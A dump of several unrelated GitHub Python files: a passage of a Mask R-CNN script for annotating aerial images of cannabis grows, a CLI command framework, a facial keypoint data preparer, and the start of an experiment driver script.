local version of the library\nfrom mrcnn import utils\nfrom mrcnn.config import Config\nimport mrcnn.model as modellib\n#from mrcnn import visualize\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs\")\n\n# Local path to trained weights file\nCOCO_MODEL_PATH = os.path.join('/media/j5/5TB/NAIP_Imagery/2016_NAIP_CNNabis_4band/logs/cnnabis_naip_2016_400bg_minified20191003T1710/mask_rcnn_cnnabis_naip_2016_400bg_minified_0024.h5')\n\n# Directory of images to run detection on\nIMAGE_DIR = '/media/j5/5TB/NAIP_Imagery/2016_NAIP_CNNabis_4band/train2016'\n\nclass CNNabisConfig(Config):\n\t\"\"\"Configuration for inference on MS COCO.\n\tDerives from the base Config class and overrides values specific\n\tto the COCO dataset.\n\t\"\"\"\n\t# Give the configuration a recognizable name\n\tNAME = \"CNNabis_inference\"\n\t# Uncomment to train on 8 GPUs (default is 1)\n\t# GPU_COUNT = 8\n\tIMAGES_PER_GPU = 2\n\t# Number of classes (including background)\n\tNUM_CLASSES = 1 + 7 # CNNabis has 6 classes + 1 background\n\t# NUM_CLASSES = 1 + 6 # CNNabis has 6 classes \n\t# Use smaller anchors because our image and objects are small\n\t#RPN_ANCHOR_SCALES = ( 8, 16, 32, 64, 96, 128) # failed?!\n\t#RPN_ANCHOR_SCALES = ( 16, 64, 128, 256, 312) # anchor side in pixels\n\t#RPN_ANCHOR_SCALES = ( 32, 64, 128, 256, 384) # anchor side in pixels\n\t#RPN_ANCHOR_SCALES = ( 32, 48, 64, 128, 256) # not small enough to big enough\n\tRPN_ANCHOR_SCALES = (16, 32, 64, 128, 256) # The RPN ratios allow us to capture smaller objects, this setting seems to be a good fit for the imagery, (ponds, and outdoor grows at least)\n\t#RPN_ANCHOR_SCALES = ( 64, 256, 384, 512, 768) # this is too big!\n\t# Detection values\n\tDETECTION_MIN_CONFIDENCE = 0.01\n\t# switch to ResNet 50 instead of 101\n\t#BACKBONE = \"resnet50\"\n\t# 4-band modifications.\n\t# alter utils.py in mrcnn folder, line 364 to leave 4 band in place\n\t# for 4-band images\n\tIMAGE_CHANNEL_COUNT = 4\n\t# adjust the mean pixel value for alpha-band\n\t# mean pixel calculated as per the CNNabis_h5py file\n\t# default values from MaskRCNN were = [123.7, 116.8, 103.9]\n\tMEAN_PIXEL = np.array([58.87, 66.51, 59.69, 148.97])\n\t# Detection instances\n\tDETECTION_MAX_INSTANCES = 80\n\t# If enabled, resizes instance masks to a smaller size to reduce\n\t# memory load. Recommended when using high-resolution images.\n\tUSE_MINI_MASK = False # this is a real memory hog, try it at work\n\tMINI_MASK_SHAPE = (80, 80) # (56, 56) # (height, width) of the mini-mask\n\t# Ratios of anchors at each cell (width/height)\n\t# A value of 1 represents a square anchor, and 0.5 is a wide anchor\n\tRPN_ANCHOR_RATIOS = [0.5, 1, 2]\n\nconfig = CNNabisConfig()\n# for inference change here to increase images per GPU\nconfig.IMAGES_PER_GPU = 10\nconfig.BATCH_SIZE = config.IMAGES_PER_GPU\nconfig.IMAGE_SHAPE = np.array([config.IMAGE_MAX_DIM, config.IMAGE_MAX_DIM, config.IMAGE_CHANNEL_COUNT])\nconfig.display()\n\n\n# ## Create Model and Load Trained Weights\n\n# Create model object in inference mode.\nmodel = modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config)\n\n# Load weights trained on MS-COCO\nmodel.load_weights(COCO_MODEL_PATH, by_name=True)\n\n\n# COCO Class names\n# Index of the class in the list is its ID. For example, to get ID of\n# the teddy bear class, use: class_names.index('teddy bear')\n# We'll have to figure out the right order... it may come from train or val... 
currently these don't match :(\nclass_names = ['BG', 'outdoor_cannabis', \"hoop_greenhouse\", \"framed_greenhouse\", \"greenhouse_footprint\", \"pond\", \"water_tank\", \"bg\"]\n# class_names = ['BG', 'outdoor_cannabis', \"hoop_greenhouse\", \"framed_greenhouse\", \"greenhouse_footprint\", \"pond\", \"water_tank\"] # use this for the temp model\n\n# Load a random image from the images folder\nfile_names = glob.glob(os.path.join(IMAGE_DIR, '*.tif'))\n\n# here we are going to keep track of the images that we've already looked at.\n# we need to link this up to an actual file later on. TODO\nreviewed_images = []\n\ndef capture_choice(result):\n\tacceptable = ['y', 'n', 'r']\n\tuser_input = input(\"Should this image be included in annotations? 'y/n' or with review 'r'\")\n\tif user_input not in acceptable:\n\t\tprint(\"Please choose y, n, or r\")\n\t\treturn capture_choice(result)\n\tif user_input == 'y':\n\t\treturn 'pass', result\n\tif user_input == 'n':\n\t\treturn 'rejected', None\n\tif user_input == 'r':\n\t\treturn 'send for review', result\n\n\ndef random_colors(N, bright=True):\n\t\"\"\"\n\tGenerate random colors.\n\tTo get visually distinct colors, generate them in HSV space then\n\tconvert to RGB.\n\t\"\"\"\n\tbrightness = 1.0 if bright else 0.7\n\thsv = [(i / N, 1, brightness) for i in range(N)]\n\tcolors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))\n\trandom.shuffle(colors)\n\treturn colors\n\ndef apply_mask(image, mask, color, alpha=0.5):\n\t\"\"\"Apply the given mask to the image.\n\t\"\"\"\n\tfor c in range(3):\n\t\timage[:, :, c] = np.where(mask == 1,\n\t\t\t\t\t\t\t\t  image[:, :, c] *\n\t\t\t\t\t\t\t\t  (1 - alpha) + alpha * color[c] * 255,\n\t\t\t\t\t\t\t\t  image[:, :, c])\n\treturn image\n\ndef display_instances(image, boxes, masks, class_ids, class_names,\n\t\t\t\t\t  scores=None, title=\"\",\n\t\t\t\t\t  ax=None,\n\t\t\t\t\t  show_mask=True, show_bbox=True,\n\t\t\t\t\t  colors=None, captions=None,\n\t\t\t\t\t  choices=None, rez=None, fig=None):\n\t\"\"\"\n\tboxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates.\n\tmasks: [height, width, num_instances]\n\tclass_ids: [num_instances]\n\tclass_names: list of class names of the dataset\n\tscores: (optional) confidence scores for each box\n\ttitle: (optional) Figure title\n\tshow_mask, show_bbox: To show masks and bounding boxes or not\n\tfigsize: (optional) the size of the image\n\tcolors: (optional) An array of colors to use with each object\n\tcaptions: (optional) A list of strings to use as captions for each object\n\t\"\"\"\n\n\t# Number of instances\n\tN = boxes.shape[0]\n\tif not N:\n\t\tprint(\"\\n*** No instances to display *** \\n\")\n\telse:\n\t\tassert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]\n\n\t# Generate random colors\n\tcolors = colors or random_colors(N)\n\n\tax.clear()\n\t# Show area outside image boundaries.\n\theight, width = image.shape[:2]\n\tax.set_ylim(height + 10, -10)\n\tax.set_xlim(-10, width + 10)\n\tax.axis('off')\n\tax.set_title(title)\n\n\tmasked_image = image.astype(np.uint32).copy()\n\n\tfor i in range(N):\n\t\t# if class_ids[i] != 1 or class_ids[i] != 5:\n\t\t# \t# skip displaying these categories\n\t\t# \tcontinue\n\t\t# make categories_of_interest greater than 0 to signify we've at least one good box\n\t\t# categories_of_interest += 1\n\n\t\tcolor = colors[i]\n\n\t\t# Bounding box\n\t\tif not np.any(boxes[i]):\n\t\t\t# Skip this instance. Has no bbox. 
Likely lost in image cropping.\n\t\t\tcontinue\n\t\ty1, x1, y2, x2 = boxes[i]\n\t\tif show_bbox:\n\t\t\tp = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,\n\t\t\t\t\t\t\t\talpha=0.7, linestyle=\"dashed\",\n\t\t\t\t\t\t\t\tedgecolor=color, facecolor='none')\n\t\t\tax.add_patch(p)\n\n\t\t# Label\n\t\tif not captions:\n\t\t\tclass_id = class_ids[i]\n\t\t\tscore = scores[i] if scores is not None else None\n\t\t\tlabel = class_names[class_id]\n\t\t\tx = random.randint(x1, (x1 + x2) // 2)\n\t\t\tcaption = \"{} {:.3f}\".format(label, score) if score else label\n\t\telse:\n\t\t\tcaption = captions[i]\n\t\tax.text(x1, y1 + 8, caption,\n\t\t\t\tcolor='w', size=11, backgroundcolor=\"none\")\n\n\t\t# Mask\n\t\tmask = masks[:, :, i]\n\t\tif show_mask:\n\t\t\tmasked_image = apply_mask(masked_image, mask, color)\n\n\t\t# Mask Polygon\n\t\t# Pad to ensure proper polygons for masks that touch image edges.\n\t\tpadded_mask = np.zeros(\n\t\t\t(mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)\n\t\tpadded_mask[1:-1, 1:-1] = mask\n\t\tcontours = find_contours(padded_mask, 0.5)\n\t\tfor verts in contours:\n\t\t\t# Subtract the padding and flip (y, x) to (x, y)\n\t\t\tverts = np.fliplr(verts) - 1\n\t\t\tp = Polygon(verts, facecolor=\"none\", edgecolor=color)\n\t\t\tax.add_patch(p)\n\tax.imshow(masked_image.astype(np.uint8))\n\t# fig.canvas.draw()\n\tplt.draw()\n\tchoices.append(capture_choice(rez))\n\ndef Inference_now(file_names, IMAGE_DIR, model):\n\timgs_for_inference = []\n\ttitles = []\n\tchoices = []\n\tfor img in range(config.IMAGES_PER_GPU):\n\t\timg_choice = random.choice(file_names)\n\t\timgs_for_inference.append(skimage.io.imread(os.path.join(IMAGE_DIR, img_choice )))\n\t\t#imgs_for_inference.append(cv2.imread(os.path.join(IMAGE_DIR, img_choice), cv2.IMREAD_UNCHANGED))\n\t\ttitles.append(img_choice)\n\t\tprint(img_choice)\n\tresults = model.detect(imgs_for_inference, verbose=1)\n\tfig, ax = plt.subplots(1, figsize=(10, 10))\n\tplt.show(block=False)\n\t# Visualize results\n\tfor count, rez in enumerate(results):\n\t\tif not rez['rois'].shape[0]:\n\t\t\tchoices.append(('rejected', None))\n\t\t\tcontinue\n\t\t############## Pickle rez for demo or experimentation purposes\n\t\t#import pickle\n\t\t#direct = os.getcwd()\n\t\t#with open(os.path.join(direct, str(count) + '.pickle'), 'wb') as handle:\n\t\t#\tpickle.dump(rez, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\t\t############## Pickle rez for demo or experimentation purposes\n\t\t# reorder bands\n\t\tcolor_img = imgs_for_inference[count][:, :, :3]\n\t\t# If no axis is passed, create one and automatically call show()\n\n\t\tdisplay_instances(color_img, rez['rois'], rez['masks'], rez['class_ids'],\n\t\t\t\tclass_names, rez['scores'], show_mask=False, title=titles[count], choices=choices, rez=rez,\n\t\t\t\t\t\t  fig=fig, ax=ax)\n\treturn dict(zip(titles, choices))\n\ndef return_passed_dict(Cannavision_result, image_full_name, images, verified_data, img_count):\n\tinstance = Cannavision_result\n\tpath, file_name = os.path.split(image_full_name)\n\theight, width = instance['masks'].shape[:2]\n\tfiles = []\n\tCannavision_result['verts'] = [None] * len(Cannavision_result['class_ids'])\n\tAnn_dict = []\n\tfor cnt, cl_id in enumerate(Cannavision_result['class_ids']):\n\t\tif cl_id == 1 or cl_id == 5:\n\t\t\t# here we handle the image info and add to the verified_data object for writing later.\n\t\t\tif file_name in images:\n\t\t\t\timage_id = images[file_name]['id']\n\t\t\telse:\n\t\t\t\timg_dict = {\"file_name\": file_name, \"height\": height, 
\"width\": width, \"id\": img_count}\n\t\t\t\timages[file_name] = img_dict\n\t\t\t\tverified_data['images'].append(img_dict)\n\t\t\t\timage_id = img_count\n\t\t\t\timg_count += 1\n\t\t\t# now we build the annotation to append to the annotations object\n\t\t\tbbox = Cannavision_result['rois'][cnt].tolist()\n\t\t\tcategory_id = Cannavision_result['class_ids'][cnt]\n\t\t\t# if category id is 5 we need to change it to 2\n\t\t\tif category_id == 5:\n\t\t\t\tcategory_id = 2\n\n\t\t\t# Mask Polygon\n\t\t\t# Pad to ensure proper polygons for masks that touch image edges.\n\t\t\tmask = Cannavision_result['masks'][:, :, cnt]\n\t\t\t### enter fix here.\n\t\t\tpadded_mask = np.zeros(\n\t\t\t\t(mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)\n\t\t\tpadded_mask[1:-1, 1:-1] = mask\n\t\t\tcontours = find_contours(padded_mask, 0.5)\n\t\t\tfor verts in contours:\n\t\t\t\t# Subtract the padding and flip (y, x) to (x, y)\n\t\t\t\tverts = np.fliplr(verts) - 1\n\t\t\t\tsegmentation_raw = verts.tolist()\n\t\t\t\teven = [even[0] for even in segmentation_raw]\n\t\t\t\todd = [odd[1] for odd in segmentation_raw]\n\t\t\t\tsegmentation = [None] * (len(even) + len(odd))\n\t\t\t\tsegmentation[::2] = [x for x in even]\n\t\t\t\tsegmentation[1::2] = [x for x in odd]\n\t\t\tCannavision_result['verts'][cnt] = segmentation\n\t\t\tAnn_dict.append({\"segmentation\": [Cannavision_result['verts'][cnt]], \"image_id\": image_id,\n\t\t\t \"bbox\": bbox, \"category_id\": category_id})\n\t\t\t# here are the files that may need review\n\t\t\tfiles.append(file_name)\n\t\telse:\n\t\t\tcontinue\n\treturn Ann_dict, img_count, files\n\n\nif __name__ == \"__main__\":\n\t# construct the argument parser and parse the arguments\n\tap = argparse.ArgumentParser()\n\tap.add_argument(\"-o\", \"--outfile\", default=home + '/_projects/Cannabis/3.4_Annotation_Augmentation/temp_passed.json',\n\t help=\"Path of folder containing all annotations files to merge\")\n\tap.add_argument(\"-r\", \"--review_outfile\", default=home + '/_projects/Cannabis/3.4_Annotation_Augmentation/temp_review.json',\n\t help=\"Path of folder containing all annotations files to merge\")\n\targs = vars(ap.parse_args())\n\n\t# read in annotation files\n\toutfile = args['outfile']\n\treview_outfile = args['review_outfile']\n\timage_review_folder = os.path.split(review_outfile)[0] + \"/images_for_review\"\n\t# create image review folder if doesn't exist\n\tif not os.path.exists(image_review_folder):\n\t\tos.mkdir(image_review_folder)\n\tprogress = os.path.split(review_outfile)[0] + \"/processed_images.txt\"\n\n\t# if a review annotation file exists, read it in and save it for merging with results later\n\t# we need to advance the image counter if this file exists. 
The pass and review files should have the same images\n\t# so you shouldn't have to do this twice\n\tif os.path.exists(outfile):\n\t\twith open(outfile, 'r') as T:\n\t\t\tTEMP = T.read()\n\t\tverified_data = json.loads(TEMP)\n\t\tannotations = deepcopy(verified_data['annotations'])\n\telse:\n\t\tverified_data = {'images': [], 'type': 'instances', 'annotations': [],\n\t\t                 'categories': [{'supercategory': 'none', 'id': 1, 'name': 'outdoor_cannabis'},\n\t\t                                {'supercategory': 'none', 'id': 2, 'name': 'pond'}]}\n\n\t# if a needs review annotation file exists, read it in\n\tif os.path.exists(review_outfile):\n\t\twith open(review_outfile, 'r') as T:\n\t\t\tTEMP = T.read()\n\t\tverified_data_review = json.loads(TEMP)\n\t\tannotations_for_review = deepcopy(verified_data_review['annotations'])\n\telse:\n\t\tannotations_for_review = []\n\n\t# keep track of the images we've already looked at using a txt file\n\tif os.path.exists(progress):\n\t\twith open(progress, 'r') as progresser:\n\t\t\tprogress_list = [line.strip() for line in progresser]\n\telse:\n\t\tprogress_list = []\n\t\twith open(progress, 'w') as temp_prog:\n\t\t\tpass\n\n\t# use the images object to use a number and retrieve a name\n\timages = {}\n\timg_count = 1\n\tfor im in verified_data['images']:\n\t\timages[im['file_name']] = im\n\t\timg_count += 1\n\n\t# use the cats object to use a number and retrieve a name\n\tcats = {}\n\tfor cat in verified_data['categories']:\n\t\tcats[cat['id']] = cat['name']\n\n\tstate = ''\n\twhile state != 'n':\n\t\tchoices = Inference_now(file_names, IMAGE_DIR, model)\n\t\t#print(choices)\n\t\tfor count, key in enumerate(choices):\n\t\t\tif choices[key][0] == 'rejected':\n\t\t\t\tfile = os.path.split(key)[1]\n\t\t\t\tprogress_list.append(file)\n\t\t\t\tcontinue\n\t\t\telif choices[key][0] == 'send for review':\n\t\t\t\tann_dict, img_count, file = return_passed_dict(choices[key][1], key, images, verified_data, img_count)\n\t\t\t\tannotations_for_review.extend(ann_dict)\n\t\t\t\tfile_n = os.path.join(IMAGE_DIR, file[0])\n\t\t\t\tcopyfile(file_n, os.path.join(image_review_folder, file[0]))\n\t\t\t\tif file and file[0] not in progress_list:\n\t\t\t\t\tprogress_list.append(file[0])\n\t\t\telif choices[key][0] == 'pass':\n\t\t\t\tann_dict, img_count, file = return_passed_dict(choices[key][1], key, images, verified_data, img_count)\n\t\t\t\t#print(ann_dict)\n\t\t\t\tannotations.extend(ann_dict)\n\t\t\t\tif file and file[0] not in progress_list:\n\t\t\t\t\tprogress_list.append(file[0])\n\t\tstate = input(\"Continue? 
(y/n)\")\n\t\tplt.close()\n\n\t# Create the structure to write out pass annotations file\n\tdata = {}\n\tdata['type'] = \"instances\"\n\tdata['images'] = verified_data['images']\n\tdata['annotations'] = annotations\n\tdata['categories'] = verified_data['categories']\n\t# if outfile exists, read it in and merge with data\n\ttry:\n\t\twith open(outfile, 'w') as W:\n\t\t\tW.write(str(data).replace('\\'', '\\\"').replace(' ', ''))\n\texcept:\n\t\tprint(\"Couldn't write to file\")\n\t# Create the structure to write out pass annotations file\n\tdata_for_review = {}\n\tdata_for_review['type'] = \"instances\"\n\tdata_for_review['images'] = verified_data['images']\n\tdata_for_review['annotations'] = annotations_for_review\n\tdata_for_review['categories'] = verified_data['categories']\n\ttry:\n\t\twith open(review_outfile, 'w') as W:\n\t\t\tW.write(str(data_for_review).replace('\\'', '\\\"').replace(' ', ''))\n\texcept:\n\t\tprint(\"Couldn't write to file\")\n\n\t# read in the old progress so we can update only the new files to the document. THis is probably overkill...\n\twith open(progress, 'r') as progresser:\n\t\tprogress_prev = [line.strip() for line in progresser]\n\twith open(progress, 'a') as progress_appender:\n\t\tfor file in progress_list:\n\t\t\tif file not in progress_prev:\n\t\t\t\tprogress_appender.write(file + '\\n')\n\n\n\n","repo_name":"jvhurley/CNNabis","sub_path":"3.4_Annotation_Augmentation/CannaVision_augment_dataset.py","file_name":"CannaVision_augment_dataset.py","file_ext":"py","file_size_in_byte":16738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74902064145","text":"from __future__ import print_function, absolute_import, unicode_literals\nfrom ._compat import input, with_metaclass, string_types\n##################################################################\n# This module is desired by Django\n##################################################################\nimport sys, os\nfrom optparse import make_option, OptionParser, IndentedHelpFormatter\nimport logging\nimport inspect\n\nlog = logging\n\ndef handle_default_options(options):\n \"\"\"\n Include any default options that all commands should accept here\n so that ManagementUtility can handle them before searching for\n user commands.\n\n \"\"\"\n pass\n\nclass CommandError(Exception):\n \"\"\"\n Exception class indicating a problem while executing a management\n command.\n\n If this exception is raised during the execution of a management\n command, it will be caught and turned into a nicely-printed error\n message to the appropriate output stream (i.e., stderr); as a\n result, raising this exception (with a sensible description of the\n error) is the preferred way to indicate that something has gone\n wrong in the execution of a command.\n\n \"\"\"\n pass\n\ndef get_answer(message, answers='Yn', default='Y', quit=''):\n \"\"\"\n Get an answer from stdin, the answers should be 'Y/n' etc.\n If you don't want the user can quit in the loop, then quit should be None.\n \"\"\"\n if quit and quit not in answers:\n answers = answers + quit\n \n message = message + '(' + '/'.join(answers) + ')[' + default + ']:'\n ans = input(message).strip().upper()\n if default and not ans:\n ans = default.upper()\n while ans not in answers.upper():\n ans = input(message).strip().upper()\n if quit and ans == quit.upper():\n print(\"Command be cancelled!\")\n sys.exit(1)\n return ans\n\ndef get_input(prompt, default=None, choices=None, option_value=None):\n \"\"\"\n If 
option_value is not None, then return it. Otherwise get the result from \n input.\n \"\"\"\n if option_value is not None:\n return option_value\n \n choices = choices or []\n while 1:\n r = input(prompt+' ').strip()\n if not r and default is not None:\n return default\n if choices:\n if r not in choices:\n r = None\n else:\n break\n else:\n break\n return r\n\n__commands__ = {}\n\ndef get_commands(modules):\n global __commands__\n \n def check(c):\n return (inspect.isclass(c) and \n issubclass(c, Command) and c is not Command and c is not CommandManager)\n \n def find_mod_commands(mod):\n for name in dir(mod):\n c = getattr(mod, name)\n if check(c):\n register_command(c)\n \n def collect_commands():\n for m in modules:\n try:\n mod = __import__(m, fromlist=['*'])\n except ImportError as e:\n if not str(e).startswith('No module named'):\n import traceback\n traceback.print_exc()\n continue\n \n find_mod_commands(mod)\n\n collect_commands()\n return __commands__\n \ndef register_command(kclass):\n global __commands__\n __commands__[kclass.name] = kclass\n\ndef call(prog_name, version, modules=None, args=None):\n from .commands import execute_command_line\n \n modules = modules or []\n \n if isinstance(args, string_types):\n import shlex\n args = shlex.split(args)\n \n execute_command_line(args or sys.argv, get_commands(modules), prog_name, version)\n\nclass CommandMetaclass(type):\n def __init__(cls, name, bases, dct):\n option_list = list(dct.get('option_list', []))\n for c in bases:\n if hasattr(c, 'option_list') and isinstance(c.option_list, list):\n option_list.extend(c.option_list)\n cls.option_list = option_list\n \nclass Command(with_metaclass(CommandMetaclass)):\n option_list = ()\n help = ''\n args = ''\n has_options = False\n\n def create_parser(self, prog_name, subcommand):\n \"\"\"\n Create and return the ``OptionParser`` which will be used to\n parse the arguments to this command.\n \n \"\"\"\n return OptionParser(prog=prog_name,\n usage=self.usage(subcommand),\n version='',\n add_help_option = False,\n option_list=self.option_list)\n def get_version(self):\n return \"%s version is %s\" % (self.prog_name, self.version)\n\n def usage(self, subcommand):\n \"\"\"\n Return a brief description of how to use this command, by\n default from the attribute ``self.help``.\n \n \"\"\"\n if self.has_options:\n usage = '%%prog %s [options] %s' % (subcommand, self.args)\n else:\n usage = '%%prog %s %s' % (subcommand, self.args)\n if self.help:\n return '%s\\n\\n%s' % (usage, self.help)\n else:\n return usage\n \n def print_help(self, prog_name, subcommand):\n \"\"\"\n Print the help message for this command, derived from\n ``self.usage()``.\n \n \"\"\"\n parser = self.create_parser(prog_name, subcommand)\n parser.print_help()\n \n def run_from_argv(self, prog, subcommand, global_options, argv):\n \"\"\"\n Set up any environment changes requested, then run this command.\n \n \"\"\"\n self.prog_name = prog\n parser = self.create_parser(prog, subcommand)\n options, args = parser.parse_args(argv)\n self.execute(args, options, global_options)\n \n def execute(self, args, options, global_options):\n try:\n self.handle(options, global_options, *args)\n except CommandError as e:\n log.exception(e)\n sys.exit(1)\n\n def handle(self, options, global_options, *args):\n \"\"\"\n The actual logic of the command. 
Subclasses must implement\n        this method.\n        \n        \"\"\"\n        raise NotImplementedError()\n    \nclass NewFormatter(IndentedHelpFormatter):\n    def format_heading(self, heading):\n        return \"%*s%s:\\n\" % (self.current_indent, \"\", 'Global Options')\n\nclass NewOptionParser(OptionParser):\n    def _process_args(self, largs, rargs, values):\n        while rargs:\n            arg = rargs[0]\n            longarg = False\n            try:\n                if arg[0:2] == \"--\" and len(arg) > 2:\n                    # process a single long option (possibly with value(s))\n                    # the superclass code pops the arg off rargs\n                    longarg = True\n                    self._process_long_opt(rargs, values)\n                elif arg[:1] == \"-\" and len(arg) > 1:\n                    # process a cluster of short options (possibly with\n                    # value(s) for the last one only)\n                    # the superclass code pops the arg off rargs\n                    self._process_short_opts(rargs, values)\n                else:\n                    # it's either a non-default option or an arg\n                    # either way, add it to the args list so we can keep\n                    # dealing with options\n                    del rargs[0]\n                    raise Exception\n            except:\n                if longarg:\n                    if '=' in arg:\n                        del rargs[0]\n                largs.append(arg)\n    \nclass CommandManager(Command):\n    usage_info = \"%prog [global_options] [subcommand [options] [args]]\"\n    \n    def __init__(self, argv=None, commands=None, prog_name=None, global_options=None, version=None):\n        self.argv = argv\n        self.version = version\n        self.prog_name = prog_name or os.path.basename(self.argv[0])\n        self.commands = commands\n        self.global_options = global_options\n    \n    def get_commands(self):\n        if callable(self.commands):\n            commands = self.commands()\n        else:\n            commands = self.commands\n        return commands\n    \n    def print_help_info(self, global_options):\n        \"\"\"\n        Returns the script's main help text, as a string.\n        \"\"\"\n        usage = ['',\"Type '%s help <subcommand>' for help on a specific subcommand.\" % self.prog_name,'']\n        usage.append('Available subcommands:')\n        commands = list(self.get_commands().keys())\n        commands.sort()\n        for cmd in commands:\n            usage.append('  %s' % cmd)\n        return '\\n'.join(usage)\n    \n    def fetch_command(self, global_options, subcommand):\n        \"\"\"\n        Tries to fetch the given subcommand, printing a message with the\n        appropriate command called from the command line (usually\n        \"uliweb\") if it can't be found.\n        \"\"\"\n        commands = self.get_commands()\n        try:\n            klass = commands[subcommand]\n        except KeyError:\n            sys.stderr.write(\"Unknown command: %r\\nType '%s help' for usage.\\n\" % \\\n                (subcommand, self.prog_name))\n            sys.exit(1)\n        return klass\n    \n    def execute(self):\n        \"\"\"\n        Given the command-line arguments, this figures out which subcommand is\n        being run, creates a parser appropriate to that command, and runs it.\n        \"\"\"\n        # Preprocess options to extract --settings and --pythonpath.\n        # These options could affect the commands that are available, so they\n        # must be processed early.\n        parser = NewOptionParser(prog=self.prog_name,\n                             usage=self.usage_info,\n#                             version=self.get_version(),\n                             formatter = NewFormatter(),\n                             add_help_option = False,\n                             option_list=self.option_list)\n        \n        if not self.global_options:\n            global_options, args = parser.parse_args(self.argv)\n            handle_default_options(global_options)\n            args = args[1:]\n        else:\n            global_options = self.global_options\n            args = self.argv\n        \n        def print_help(global_options):\n            parser.print_help()\n            sys.stderr.write(self.print_help_info(global_options) + '\\n')\n            sys.exit(1)\n        \n        if len(args) == 0:\n            if global_options.version:\n                print(self.get_version())\n                sys.exit(1)\n            else:\n                print_help(global_options)\n                sys.exit(1)\n        \n        try:\n            subcommand = args[0]\n        except IndexError:\n            subcommand = 'help' # 
Display help if no arguments were given.\n        \n        if subcommand == 'help':\n            if len(args) > 1:\n                command = self.fetch_command(global_options, args[1])\n                if issubclass(command, CommandManager):\n                    cmd = command(['help'], None, '%s %s' % (self.prog_name, args[1]), global_options=global_options)\n                    cmd.execute()\n                else:\n                    command().print_help(self.prog_name, args[1])\n                sys.exit(1)\n            else:\n                print_help(global_options)\n        if global_options.help:\n            print_help(global_options)\n        else:\n            command = self.fetch_command(global_options, subcommand)\n            if issubclass(command, CommandManager):\n                cmd = command(args[1:], None, '%s %s' % (self.prog_name, subcommand), global_options=global_options)\n                cmd.execute()\n            else:\n                cmd = command()\n                cmd.run_from_argv(self.prog_name, subcommand, global_options, args[1:])\n    \nclass ApplicationCommandManager(CommandManager):\n    option_list = (\n        make_option('--help', action='store_true', dest='help',\n            help='show this help message and exit.'),\n        make_option('-v', '--verbose', action='store_true', \n            help='Output the result in verbose mode.'),\n        make_option('--version', action='store_true', dest='version',\n            help=\"show program's version number and exit.\"),\n    )\n    help = ''\n    args = ''\n    \ndef execute_command_line(argv=None, commands=None, prog_name=None, version=None):\n    m = ApplicationCommandManager(argv, commands, prog_name, version=version)\n    m.execute()\n    \nif __name__ == '__main__':\n    execute_command_line(sys.argv)","repo_name":"limodou/parm","sub_path":"parm/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":12433,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"}{"seq_id":"40011803684","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nimport os\nfrom sklearn.model_selection import train_test_split\n\nresize=100\n\ndirect='./combined'\n\n\n\nlistn=[]\n\ndata=[]\nannot=[]\nfor filename in os.listdir(direct): \n\tif(filename.split('.')[1]!='pts'):\n \t\tlistn.append(filename)\nq=0\nfor k in listn:\n\tprint(q)\n\tq+=1\n\n\tx=[]\n\ty=[]\n\twith open(direct+'/'+k.split('.')[0]+'.pts') as f:\n\t    annots= f.readlines()[3:-1]\n\tfor i in annots:\n\t\ti=i.rstrip(\"\\r\\n\")\n\t\ttry:\n\t\t\tx1,y1=i.split(' ')\n\t\texcept:\n\t\t\tprint(k)\n\t\t\tcontinue\n\t\tx1=float(x1)\n\t\ty1=float(y1)\n\t\tx.append(x1)\n\t\ty.append(y1)\n\n\timage=cv2.imread(direct+'/'+k)\n\tresized_image = cv2.resize(image, (resize, resize))\n\ttry:\n\t\txs,ys,_=image.shape\n\texcept:\n\t\tcontinue\n\txscale=resize/xs\n\tyscale=resize/ys\n\n\tx2= [i * yscale for i in x]\n\ty2= [i * xscale for i in y]\n\n\tx22=np.array([x2,y2])\n\n\n\n\tdata.append(resized_image)\n\tannot.append(x22)\n\nprint('data loaded......')\n\nX=np.array(data)\nY=np.array(annot)\n\nprint('converted to array...........')\n\nx_train, x_test, y_train, y_test = train_test_split(X, Y, random_state=42)\n\n\nprint('saving train test...............')\nnp.save('x_keypoints_train',x_train)\n\nnp.save('x_keypoints_test',x_test)\n\nnp.save('y_keypoints_test',y_test)\nnp.save('y_keypoints_train',y_train)\n\n\t\n","repo_name":"TejaGollapudi/Facial-Keypoint-Annotation","sub_path":"300 wild face annotations/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}{"seq_id":"74631443665","text":"import subprocess\nimport os\nimport sys\nimport argparse\n\nthis_directory = os.path.dirname(os.path.realpath(__file__)) + 
\"/\"\nthis_filename = sys.argv[0].split('/')[-1]\n\nparser = argparse.ArgumentParser(description='Sriver script to run experiments, extract the result and generate the figures.',\n usage='python {} -s stage'.format(this_filename[:-3]))\n\nparser.add_argument('-e', '--environment', type=str, choices=['local', 'cluster'], default='local',\n help='Run the experiments locally or in the cluster. Only for the scan action. Default: local')\n\nparser.add_argument('-a', '--action', type=str, choices=['scan', 'extract', 'plot'],\n help='Which action to run, required option')\n\nparser.add_argument('-t', '--testcases', default='lhc,sps,ps',\n help='A comma separated list of the testcases to run. Default: lhc,sps,ps')\n\nparser.add_argument('-d', '--dir', type=str, default='./results/local',\n help='Directory to store the output data (scan) or to read the input (extract, plot). Default: ./results/local')\n\n\nscripts = {\n 'scan': os.path.join(this_directory, 'scan/scan.py'),\n 'extract': os.path.join(this_directory, 'extract/extract_all.py'),\n 'plot': os.path.join(this_directory, 'plot/plot_all.py'),\n}\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n environment = args.environment\n\n if args.action == 'scan':\n print('Running: {} action.'.format(args.action))\n cmd = ['python', scripts['scan'],\n '-e', args.environment,\n '-o', os.path.join(args.dir, environment),\n '-t', args.testcases]\n subprocess.run(cmd, stdout=sys.stdout,\n 